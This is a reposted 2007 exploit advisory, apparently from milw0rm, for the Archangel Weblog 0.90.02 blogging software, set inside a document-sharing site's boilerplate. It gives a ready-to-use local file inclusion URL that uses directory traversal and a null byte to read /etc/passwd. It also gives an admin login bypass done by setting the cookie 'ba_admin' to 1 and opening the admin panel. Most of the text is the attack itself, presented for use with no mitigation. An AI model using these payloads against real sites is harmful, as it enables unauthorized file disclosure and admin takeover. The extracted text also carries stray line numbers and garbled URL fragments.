Archangel Weblog 0.90.02 Local File Inclusion Admin Bypass Vulns.pdf

About Global Documents

Global Documents provides you with documents from around the globe on a variety of topics for your enjoyment.

Global Documents utilizes edocr for all its document needs due to edocr's wonderful content features. Thousands of professionals and businesses around the globe publish marketing, sales, operations, customer service and financial documents making it easier for prospects and customers to find content.

http TARGET PATH http www archangelmgt index php index Local File Inclusion Dj7xpl

1                       \\\|///
2                     \\  − −  //
3                      (  @ @ )
4               −−−−oOOo−−(_)−oOOo−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
5               Portal   :  Archangel Weblog version 0.90.02
6
      Home     :  http://www.archangelmgt.com/weblog.shtml
7               Download :  http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
8
      Author   :  Dj7xpl / Dj7xpl@2600.ir
9
      HomePage :  http://Dj7xpl.2600.ir
10
      Type     :  Local File Inclusion & Login Page Bypass By Cookie
11               −−−−ooooO−−−−−Ooooo−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
12                   (   )     (   )
13                    \ (       ) /
14                     \_)     (_/
15
16
17
18 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
19
20 Local File Include :
21
22 http://[TARGET]/[PATH]/index.php?index=[Local File]%00
23 http://Target.com/blog/index.php?index=../../../../etc/passwd%00
24
25 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
26
27
28 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
29
30 Edit Cookie :
31
32 Host  : Target
33 Name  : ba_admin
34 Value : 1      <−−−−−− (Admin User Id)
35
36 And Go To Admin Panel :
37
38 http://[Target]/[Path]/Admin/
39
40 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
41
42 # milw0rm.com [2007−05−05]
Page 1/1
Archangel Weblog 0.90.02 Local File Inclusion Admin Bypass Vulns
Dj7xpl
05/05/2007